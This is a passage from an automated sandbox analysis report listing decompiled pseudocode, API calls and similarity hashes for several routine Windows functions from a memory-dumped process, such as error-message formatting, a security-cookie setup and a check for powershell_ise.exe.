                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 0337F39A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: 53e84bcdcaadd94362f0325be43dddb545f22e6cc756b3f34a4339f472bdb083
                                                                                                                                                                                                                              • Instruction ID: 60755ac788c486140f01df0a773b0eaad2b6bddfd2a71aad9a17aea744ef2989
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e84bcdcaadd94362f0325be43dddb545f22e6cc756b3f34a4339f472bdb083
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A11129B6D002599FDB10CF9AD4847DEFBB4BB08324F148529D428B7240D378A944CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01259840, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wgetmainargs
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1709950718-0
                                                                                                                                                                                                                              • Opcode ID: 9df6b8f1225a6dc531b1889ef3ebb7916e9d6b7f3652544f40df8364e9d2493c
                                                                                                                                                                                                                              • Instruction ID: 132dfe91ab2dfb91d46be5351e4c181a286937a0def9c367e4a37b3bf946f495
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9df6b8f1225a6dc531b1889ef3ebb7916e9d6b7f3652544f40df8364e9d2493c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60D0E9B0671340EF8B60AB6AB90A8133A64B688A13710855DF541911E9D7B174F0BB1D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 012590D0, Relevance: 12.2, APIs: 8, Instructions: 179windowCOMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                              			E012590D0(intOrPtr _a4, void* _a8, void** _a12, void* _a16, intOrPtr _a20, char _a24) {
				signed int _v8;
				void* _v9;
				short _v16;
				short _v20;
				char* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				void* _t46;
				signed int* _t47;
				short _t49;
				long _t50;
				intOrPtr* _t57;
				void* _t60;
				void* _t65;
				signed int _t69;
				signed int* _t70;
				void* _t71;
				void* _t87;
				void* _t92;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t99;
				void** _t100;
				signed int _t101;
				void* _t102;
				void* _t103;

				_t43 =  *0x1260358; // 0xc21f7063
				_v8 = _t43 ^ _t101;
				_v20 = 0;
				_v24 =  &_a24;
				_t46 = _a8;
				_v9 = 1;
				if(_t46 == 0) {
					L23:
					_t47 = 0;
					L21:
					return E01259A40(_t47, _t70, _v8 ^ _t101, _t88, _t92, _t95);
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L23;
				}
				_t92 = _a16;
				if(_t92 == 0) {
					goto L23;
				}
				_push(_t95);
				_t49 = FormatMessageW(0x500, _t46, 0, 0,  &_v20, 0,  &_v24);
				_v16 = _t49;
				_t111 = _t49;
				if(_t49 == 0) {
					_t50 = GetLastError();
					_v16 = 0;
					_t96 = FormatMessageW(0x1100, 0, _t50, 0,  &_v16, 0, 0);
					__eflags = _t96;
					if(_t96 == 0) {
						L31:
						_t47 = 0;
						L20:
						_pop(_t95);
						goto L21;
					}
					_t28 = _t96 + 1; // 0x1
					_t88 = _t28 * 2 >> 0x20;
					_t92 = E0125972E( ~(0 | __eflags > 0x00000000) | _t28 * 0x00000002);
					_t103 = _t102 + 4;
					__eflags = _t92;
					if(_t92 != 0) {
						_t36 = _t96 + 1; // 0x1
						_t88 = _t36;
						_t60 = E0125CE50(_t92, _t36, _v16);
						__eflags = _t60;
						if(_t60 < 0) {
							_t96 = 0;
							free(_t92);
							_t103 = _t103 + 4;
							_t92 = 0;
							__eflags = 0;
						}
					}
					LocalFree(_v16);
					__eflags = _t96;
					if(_t96 != 0) {
						_t57 =  *((intOrPtr*)(_a4 + 4));
						 *0x1261204(_t57, 0, _a20, _t92);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57 + 4))))();
						__eflags = _t92;
						if(_t92 != 0) {
							free(_t92);
						}
					}
					goto L31;
				}
				_t12 = _t49 + 1; // 0x1
				_t99 = _t12;
				_t88 = E0125972E( ~(0 | _t111 > 0x00000000) | _t99 * 0x00000002);
				 *_t70 = _t88;
				if(_t88 == 0) {
					L22:
					_t70 = 0;
					L19:
					LocalFree(_v20);
					_t47 = _t70;
					goto L20;
				}
				_t71 = 0;
				if(_t99 == 0 || _t99 > 0x7fffffff) {
					_t71 = 0x80070057;
				}
				if(_t71 < 0) {
					__eflags = _t99;
					if(_t99 == 0) {
						goto L17;
					}
					goto L16;
				} else {
					_t87 = _v20;
					_t71 = 0;
					if(_t99 == 0) {
						L13:
						_t88 = _t88 - 2;
						_t71 = 0x8007007a;
						goto L15;
					} else {
						_t94 = 0x7ffffffe - _t99;
						while(_t94 + _t99 != 0) {
							_t69 =  *_t87 & 0x0000ffff;
							if(_t69 == 0) {
								break;
							}
							 *_t88 = _t69;
							_t87 = _t87 + 2;
							_t88 = _t88 + 2;
							_t99 = _t99 - 1;
							if(_t99 != 0) {
								continue;
							}
							goto L13;
						}
						__eflags = _t99;
						if(_t99 == 0) {
							goto L13;
						}
						L15:
						_t92 = _a16;
						L16:
						 *_t88 = 0;
						L17:
						if(_t71 < 0) {
							_t100 = _a12;
							_t65 =  *_t100;
							__eflags = _t65;
							if(_t65 != 0) {
								free(_t65);
								 *_t100 = 0;
							}
							goto L22;
						} else {
							_t70 = _v9;
							 *_t92 = _v16;
							goto L19;
						}
					}
				}
			}

































                                                                                                                                                                                                                              0x012590d8
                                                                                                                                                                                                                              0x012590df
                                                                                                                                                                                                                              0x012590e5
                                                                                                                                                                                                                              0x012590ec
                                                                                                                                                                                                                              0x012590ef
                                                                                                                                                                                                                              0x012590f2
                                                                                                                                                                                                                              0x012590fa
                                                                                                                                                                                                                              0x012591f7
                                                                                                                                                                                                                              0x012591f7
                                                                                                                                                                                                                              0x012591e3
                                                                                                                                                                                                                              0x012591f2
                                                                                                                                                                                                                              0x012591f2
                                                                                                                                                                                                                              0x01259100
                                                                                                                                                                                                                              0x01259105
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125910b
                                                                                                                                                                                                                              0x01259110
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259116
                                                                                                                                                                                                                              0x0125912b
                                                                                                                                                                                                                              0x01259131
                                                                                                                                                                                                                              0x01259134
                                                                                                                                                                                                                              0x01259136
                                                                                                                                                                                                                              0x0125b377
                                                                                                                                                                                                                              0x0125b384
                                                                                                                                                                                                                              0x0125b39c
                                                                                                                                                                                                                              0x0125b39e
                                                                                                                                                                                                                              0x0125b3a0
                                                                                                                                                                                                                              0x0125b41b
                                                                                                                                                                                                                              0x0125b41b
                                                                                                                                                                                                                              0x012591e2
                                                                                                                                                                                                                              0x012591e2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591e2
                                                                                                                                                                                                                              0x0125b3a4
                                                                                                                                                                                                                              0x0125b3ac
                                                                                                                                                                                                                              0x0125b3bb
                                                                                                                                                                                                                              0x0125b3bd
                                                                                                                                                                                                                              0x0125b3c0
                                                                                                                                                                                                                              0x0125b3c2
                                                                                                                                                                                                                              0x0125b3c7
                                                                                                                                                                                                                              0x0125b3c7
                                                                                                                                                                                                                              0x0125b3cc
                                                                                                                                                                                                                              0x0125b3d1
                                                                                                                                                                                                                              0x0125b3d3
                                                                                                                                                                                                                              0x0125b3d6
                                                                                                                                                                                                                              0x0125b3d8
                                                                                                                                                                                                                              0x0125b3dd
                                                                                                                                                                                                                              0x0125b3e0
                                                                                                                                                                                                                              0x0125b3e0
                                                                                                                                                                                                                              0x0125b3e0
                                                                                                                                                                                                                              0x0125b3d3
                                                                                                                                                                                                                              0x0125b3e5
                                                                                                                                                                                                                              0x0125b3eb
                                                                                                                                                                                                                              0x0125b3ed
                                                                                                                                                                                                                              0x0125b3f6
                                                                                                                                                                                                                              0x0125b403
                                                                                                                                                                                                                              0x0125b409
                                                                                                                                                                                                                              0x0125b40e
                                                                                                                                                                                                                              0x0125b410
                                                                                                                                                                                                                              0x0125b413
                                                                                                                                                                                                                              0x0125b418
                                                                                                                                                                                                                              0x0125b410
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b3ed
                                                                                                                                                                                                                              0x0125913c
                                                                                                                                                                                                                              0x0125913c
                                                                                                                                                                                                                              0x01259157
                                                                                                                                                                                                                              0x0125915c
                                                                                                                                                                                                                              0x01259160
                                                                                                                                                                                                                              0x012591f3
                                                                                                                                                                                                                              0x012591f3
                                                                                                                                                                                                                              0x012591d7
                                                                                                                                                                                                                              0x012591da
                                                                                                                                                                                                                              0x012591e0
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591e0
                                                                                                                                                                                                                              0x01259166
                                                                                                                                                                                                                              0x0125916a
                                                                                                                                                                                                                              0x0125b422
                                                                                                                                                                                                                              0x0125b422
                                                                                                                                                                                                                              0x0125917e
                                                                                                                                                                                                                              0x0125b42c
                                                                                                                                                                                                                              0x0125b42e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259184
                                                                                                                                                                                                                              0x01259184
                                                                                                                                                                                                                              0x01259187
                                                                                                                                                                                                                              0x0125918b
                                                                                                                                                                                                                              0x012591b1
                                                                                                                                                                                                                              0x012591b1
                                                                                                                                                                                                                              0x012591b4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125918d
                                                                                                                                                                                                                              0x01259192
                                                                                                                                                                                                                              0x01259194
                                                                                                                                                                                                                              0x0125919b
                                                                                                                                                                                                                              0x012591a1
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591a3
                                                                                                                                                                                                                              0x012591a6
                                                                                                                                                                                                                              0x012591a9
                                                                                                                                                                                                                              0x012591ac
                                                                                                                                                                                                                              0x012591af
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591af
                                                                                                                                                                                                                              0x012591bb
                                                                                                                                                                                                                              0x012591bd
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591bf
                                                                                                                                                                                                                              0x012591bf
                                                                                                                                                                                                                              0x012591c2
                                                                                                                                                                                                                              0x012591c4
                                                                                                                                                                                                                              0x012591c7
                                                                                                                                                                                                                              0x012591c9
                                                                                                                                                                                                                              0x0125b439
                                                                                                                                                                                                                              0x0125b43c
                                                                                                                                                                                                                              0x0125b43e
                                                                                                                                                                                                                              0x0125b440
                                                                                                                                                                                                                              0x0125b447
                                                                                                                                                                                                                              0x0125b44f
                                                                                                                                                                                                                              0x0125b44f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591cf
                                                                                                                                                                                                                              0x012591d2
                                                                                                                                                                                                                              0x012591d5
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591d5
                                                                                                                                                                                                                              0x012591c9
                                                                                                                                                                                                                              0x0125918b

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00000500,00000017,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0125912B
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 012591DA
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0125B377
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000017,00000000,00000000), ref: 0125B396
                                                                                                                                                                                                                              • free.MSVCRT(00000000,00000000), ref: 0125B3D8
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0125B3E5
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00002014,00000001,?), ref: 0125B413
                                                                                                                                                                                                                                • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125B447
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$FormatFreeLocalMessage$ErrorLastmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2313333890-0
                                                                                                                                                                                                                              • Opcode ID: af6f6bc3c9b93c16d90a6e4fa761e569b4e8f0d166d2c0e44876e44b778bc600
                                                                                                                                                                                                                              • Instruction ID: c3bd97a2b216ea22d80f192c2a05ba28f1f461328425bda439e57eb1732e5aa4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af6f6bc3c9b93c16d90a6e4fa761e569b4e8f0d166d2c0e44876e44b778bc600
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B51F775A20216DBEF608F68CCC9BBB7BA6EF44704F148119EE01A7284DB75E940C791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C197, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                              			E0125C197() {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t12;
				void* _t14;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t28 = (_t26 & 0xfffffff8) - 0x258;
				_t4 =  *0x1260358; // 0xc21f7063
				_v8 = _t4 ^ (_t26 & 0xfffffff8) - 0x00000258;
				_t21 = 0;
				_t24 = malloc(0x20a);
				if(_t24 != 0) {
					if(ExpandEnvironmentStringsW(L"%systemroot%\\system32\\windowspowershell\\v1.0\\powershell_ise.exe", _t24, 0x104) - 1 <= 0x103) {
						_t12 = FindFirstFileW(_t24,  &_v604);
						if(_t12 != 0xffffffff) {
							_t21 = 1;
							FindClose(_t12);
						}
					}
					free(_t24);
				}
				_pop(_t22);
				_pop(_t25);
				return E01259A40(_t21, _t14, _v8 ^ _t28, _t19, _t22, _t25);
			}
















                                                                                                                                                                                                                              0x0125c19f
                                                                                                                                                                                                                              0x0125c1a5
                                                                                                                                                                                                                              0x0125c1ac
                                                                                                                                                                                                                              0x0125c1ba
                                                                                                                                                                                                                              0x0125c1c2
                                                                                                                                                                                                                              0x0125c1c7
                                                                                                                                                                                                                              0x0125c1e0
                                                                                                                                                                                                                              0x0125c1e8
                                                                                                                                                                                                                              0x0125c1f1
                                                                                                                                                                                                                              0x0125c1f4
                                                                                                                                                                                                                              0x0125c1f5
                                                                                                                                                                                                                              0x0125c1f5
                                                                                                                                                                                                                              0x0125c1f1
                                                                                                                                                                                                                              0x0125c1fc
                                                                                                                                                                                                                              0x0125c202
                                                                                                                                                                                                                              0x0125c20c
                                                                                                                                                                                                                              0x0125c20d
                                                                                                                                                                                                                              0x0125c218

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 0125C1BC
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000104), ref: 0125C1D4
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 0125C1E8
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0125C1F5
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125C1FC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe, xrefs: 0125C1CF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseEnvironmentExpandFileFirstStringsfreemalloc
                                                                                                                                                                                                                              • String ID: %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe
                                                                                                                                                                                                                              • API String ID: 2430906653-803825474
                                                                                                                                                                                                                              • Opcode ID: 747b4a79dbc2214588f1e0c7668a17a30341a35c7dd3b5f18bb5fe8dbd067839
                                                                                                                                                                                                                              • Instruction ID: 6aec9891fd78822b1608bccdd711498e83040307f2ba209060321b64b90dd058
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 747b4a79dbc2214588f1e0c7668a17a30341a35c7dd3b5f18bb5fe8dbd067839
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82F04F32618640ABD330A729BC8C9BF3B58DBC9332F004219FE29D21D0EB70582183A6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125A093, Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E0125A093() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1260358; // 0xc21f7063
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1260358 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1260358 = _t39;
				}
				_t37 =  !_t36;
				 *0x126035c = _t37;
				return _t37;
			}











                                                                                                                                                                                                                              0x0125a09b
                                                                                                                                                                                                                              0x0125a09f
                                                                                                                                                                                                                              0x0125a0a3
                                                                                                                                                                                                                              0x0125a0b6
                                                                                                                                                                                                                              0x0125a0c0
                                                                                                                                                                                                                              0x0125a0cc
                                                                                                                                                                                                                              0x0125a0d5
                                                                                                                                                                                                                              0x0125a0de
                                                                                                                                                                                                                              0x0125a0ef
                                                                                                                                                                                                                              0x0125a0f6
                                                                                                                                                                                                                              0x0125a102
                                                                                                                                                                                                                              0x0125a105
                                                                                                                                                                                                                              0x0125a109
                                                                                                                                                                                                                              0x0125a113
                                                                                                                                                                                                                              0x0125a118
                                                                                                                                                                                                                              0x0125a118
                                                                                                                                                                                                                              0x0125a11a
                                                                                                                                                                                                                              0x0125a11a
                                                                                                                                                                                                                              0x0125a120
                                                                                                                                                                                                                              0x0125a123
                                                                                                                                                                                                                              0x0125a12c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0125A0C0
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0125A0CF
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0125A0D8
                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0125A0E1
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0125A0F6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                              • Opcode ID: de9389a00e45ac5be7014513a18ea6391ac1b564c9a0f1a909fbed3cd2d4412f
                                                                                                                                                                                                                              • Instruction ID: d41e78091770f6c5a6dfd4b770fe69cff99a88c064c2edf55b2cca05d3bb4dc8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de9389a00e45ac5be7014513a18ea6391ac1b564c9a0f1a909fbed3cd2d4412f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84111C71E20248EBCF21DFB8E58D6AEBBF4EF48351F658556E901E7258E6309A109B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C231, Relevance: 6.1, APIs: 4, Instructions: 58comCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                              			E0125C231(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t29;
				void* _t49;

				_t33 = __ebx;
				E0125A5F0(E0125A825, __ebx, __edi, __esi);
				_t46 = __ecx;
				_t48 = 0;
				__imp__CoInitialize(0, 0x10);
				 *((intOrPtr*)(_t49 - 0x14)) = 0;
				_t21 = _t49 - 0x14;
				 *((intOrPtr*)(_t49 - 4)) = 0;
				 *((intOrPtr*)(_t49 - 0x1c)) = 0;
				__imp__CoCreateInstance(0x12531c0, 0, 1, 0x125336c, _t21);
				if(_t21 < 0) {
					L7:
					__imp__CoUninitialize();
					L8:
					E01259691(_t49 - 0x14);
					return E0125A59F(_t33, _t46, _t48);
				}
				 *((intOrPtr*)(_t49 - 0x18)) = 0;
				 *((char*)(_t49 - 4)) = 1;
				_t24 =  *((intOrPtr*)(_t49 - 0x14));
				_t48 =  *_t24;
				 *0x1261204(_t24, _t49 - 0x1c, 0x1253c18, _t49 - 0x18);
				if( *((intOrPtr*)( *_t24 + 0x10))() < 0) {
					L6:
					E01259691(_t49 - 0x18);
					goto L7;
				}
				if( *((intOrPtr*)(_t49 - 0x1c)) >= 4) {
					_t28 = E0125BC92(__ebx,  *((intOrPtr*)(_t49 - 0x14)), __ecx, __ecx, _t48, __eflags);
					__eflags = _t28;
					if(_t28 >= 0) {
						_t29 =  *((intOrPtr*)(_t49 - 0x14));
						_t48 =  *((intOrPtr*)( *_t29 + 0x20));
						 *0x1261204(_t29);
						 *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x20))))();
					}
					goto L6;
				}
				E01259691(_t49 - 0x18);
				goto L8;
			}








                                                                                                                                                                                                                              0x0125c231
                                                                                                                                                                                                                              0x0125c238
                                                                                                                                                                                                                              0x0125c23d
                                                                                                                                                                                                                              0x0125c23f
                                                                                                                                                                                                                              0x0125c242
                                                                                                                                                                                                                              0x0125c248
                                                                                                                                                                                                                              0x0125c24b
                                                                                                                                                                                                                              0x0125c24e
                                                                                                                                                                                                                              0x0125c25f
                                                                                                                                                                                                                              0x0125c262
                                                                                                                                                                                                                              0x0125c26a
                                                                                                                                                                                                                              0x0125c2cf
                                                                                                                                                                                                                              0x0125c2cf
                                                                                                                                                                                                                              0x0125c2d5
                                                                                                                                                                                                                              0x0125c2d8
                                                                                                                                                                                                                              0x0125c2e2
                                                                                                                                                                                                                              0x0125c2e2
                                                                                                                                                                                                                              0x0125c26c
                                                                                                                                                                                                                              0x0125c26f
                                                                                                                                                                                                                              0x0125c276
                                                                                                                                                                                                                              0x0125c282
                                                                                                                                                                                                                              0x0125c289
                                                                                                                                                                                                                              0x0125c294
                                                                                                                                                                                                                              0x0125c2c7
                                                                                                                                                                                                                              0x0125c2ca
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c2ca
                                                                                                                                                                                                                              0x0125c29a
                                                                                                                                                                                                                              0x0125c2ab
                                                                                                                                                                                                                              0x0125c2b0
                                                                                                                                                                                                                              0x0125c2b2
                                                                                                                                                                                                                              0x0125c2b4
                                                                                                                                                                                                                              0x0125c2ba
                                                                                                                                                                                                                              0x0125c2bf
                                                                                                                                                                                                                              0x0125c2c5
                                                                                                                                                                                                                              0x0125c2c5
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c2b2
                                                                                                                                                                                                                              0x0125c29f
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125C238
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0125C242
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(012531C0,00000000,00000001,0125336C,?), ref: 0125C262
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0125C2CF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateH_prolog3_InitializeInstanceUninitialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3977827446-0
                                                                                                                                                                                                                              • Opcode ID: dfcd8511d079e3e36db4da3b906ea03fe33fc897518228e382a713f07241b972
                                                                                                                                                                                                                              • Instruction ID: 0e3ca58a2587fa3791595dc21c0bfa17aa7c5b41b4b263d47af834e0f7b6c826
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfcd8511d079e3e36db4da3b906ea03fe33fc897518228e382a713f07241b972
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA116D70A1021ADFCB54DBA0D9899BF7B78FF54745B104018E902A7290DB70AA55CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01259BEC, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E01259BEC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
